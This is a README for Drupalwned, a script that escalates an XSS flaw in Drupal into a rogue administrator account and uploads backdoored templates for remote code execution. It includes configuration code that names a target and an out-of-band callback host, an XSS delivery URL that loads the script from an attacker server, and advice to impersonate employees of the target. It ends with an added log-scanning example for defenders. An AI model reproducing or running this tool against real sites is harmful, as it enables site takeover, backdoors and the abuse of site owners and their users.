About - Key Features - How To Use - Examples - Contributing
Drupalwned is a script designed to escalate a Cross-Site Scripting (XSS) vulnerability to Remote Code Execution (RCE) or other critical vulnerabilities in Drupal CMS.
💧 This script provides support for Drupal Versions 7.X.X, 8.X.X, 9.X.X and 10.X.X. 💧
- Privilege Escalation
  - Creates an administrative user in Drupal.
- (RCE) Upload Template
  - Uploads custom backdoored templates to Drupal.
- // Pending
  - More ways to get RCE
1) Clone the Repository
git clone https://github.com/nowak0x01/Drupalwned
2) Edit the script by selecting the desired function and modifying its variable values. (Example: DPCreateAccount)
```js
// ************************************ ~% Variables %~ ************************************ //
var Target = "https://172.17.0.1:8000/"; // Ex: https://192.168.84.212:8000/drupal/
var Callback = "http://zfi0g0xtiqb6qjh564xr92xnxe35rvfk.oastify.com/"; // Ex: https://collaborator.oastify.com/ (optional) (only if you want to receive feedback at each stage).
// ************************************ ~% Functions %~ ************************************ //
// DPCreateAccount(); // (Privilege Escalation) - Creates an Administrative user in Drupal.
// DPUploadTemplate(); // (RCE) - Upload a Template module (backdoor) to Drupal.
function DPCreateAccount() {
    /* ************************************************************************************************************************************************ */
    var Email = "nowak@example.com"; // Ex: user@company.net (It is recommended to use a business email from the target company) (No email will be sent to the email address entered). - <Mandatory>
    var Username = "nowak"; // (It is recommended to use a valid employee name from the target company). - <Mandatory>
    var Password = `j^QEkyvd7*g3`; /* - <Mandatory>
        Make it at least 12 characters
        Add lowercase letters
        Add uppercase letters
        Add numbers
        Add punctuation
    */
    /* ************************************************************************************************************************************************ */
```
3) Start a web server
python3 -m http.server 80
4) Go to the Drupal XSS vector and include drupalwned.js
https://drupal.example.com/plugin.php?s=<script%20src="//VPS/drupalwned.js"></script>
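For defenders, the delivery step above leaves a trace in web server logs: a query parameter carrying a `<script src=...>` tag. The following is an added example, not part of Drupalwned, that flags such requests in access-log lines; the hostnames, sample log lines and function names are constructed for illustration.

```javascript
// Added example (not part of Drupalwned): flag access-log requests whose query
// string carries a <script src=...> tag, the delivery pattern shown in step 4.
const SITE_HOST = "drupal.example.com"; // assumption: the site's own hostname
// Constructed sample lines in combined log format (not real traffic).
const SAMPLE_LOG = [
  '203.0.113.7 - - [10/Jan/2024:10:00:01 +0000] "GET /node/1?page=2 HTTP/1.1" 200 5120',
  '203.0.113.9 - - [10/Jan/2024:10:00:05 +0000] "GET /plugin.php?s=%3Cscript%20src=%22//cdn.invalid/x.js%22%3E%3C/script%3E HTTP/1.1" 200 812',
  // Double-encoded variant, as logged when something downstream decodes again.
  '203.0.113.9 - - [10/Jan/2024:10:00:09 +0000] "GET /search?q=%253Cscript%2520src%253Dhttps%253A%252F%252Fcdn.invalid%252Fy.js%253E HTTP/1.1" 200 640',
  '198.51.100.4 - - [10/Jan/2024:10:00:12 +0000] "GET /page?w=%3Cscript%20src=/core/misc/drupal.js%3E HTTP/1.1" 200 700',
];
const SCRIPT_SRC = /<script\b[^>]*?\bsrc\s*=\s*["']?([^"'\s>]+)/gi;

// Percent-decode repeatedly so double-encoded payloads are normalised too.
function fullyDecode(value, maxRounds = 3) {
  let current = value;
  for (let i = 0; i < maxRounds; i++) {
    let next;
    try { next = decodeURIComponent(current); } catch { break; } // malformed escape
    if (next === current) break;
    current = next;
  }
  return current;
}

// Returns one entry per injected script tag found in the request's query string.
function findScriptInjection(logLine, siteHost = SITE_HOST) {
  const req = /"[A-Z]+ (\S+) HTTP\/[\d.]+"/.exec(logLine);
  if (!req || !req[1].includes("?")) return [];
  const query = req[1].slice(req[1].indexOf("?") + 1);
  const hits = [];
  for (const [param, raw] of new URLSearchParams(query)) {
    for (const m of fullyDecode(raw).matchAll(SCRIPT_SRC)) {
      let host;
      try { host = new URL(m[1], `https://${siteHost}/`).hostname; } catch { host = null; }
      hits.push({ param, src: m[1], host, external: host !== siteHost });
    }
  }
  return hits;
}

// Scan a batch of lines; report the client address and findings per flagged line.
function scanLog(lines) {
  return lines
    .map((line) => ({ client: line.split(" ", 1)[0], hits: findScriptInjection(line) }))
    .filter((r) => r.hits.length > 0);
}
console.log(JSON.stringify(scanLog(SAMPLE_LOG), null, 2));
```

Any hit means markup reached a request parameter; `external: true` marks the case where the script would be fetched from a host other than the site itself.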
🌧️ DPCreateAccount() - Creates a user in Drupal.
⛅ DPUploadTemplate() - Uploads a custom backdoored template to Drupal.
If you're interested in contributing or enhancing the existing code, your efforts would be immensely appreciated. Your contributions will play a key role in making this project even better.
Drupalwned (https://github.com/nowak0x01/Drupalwned)
@Author: Hudson Nowak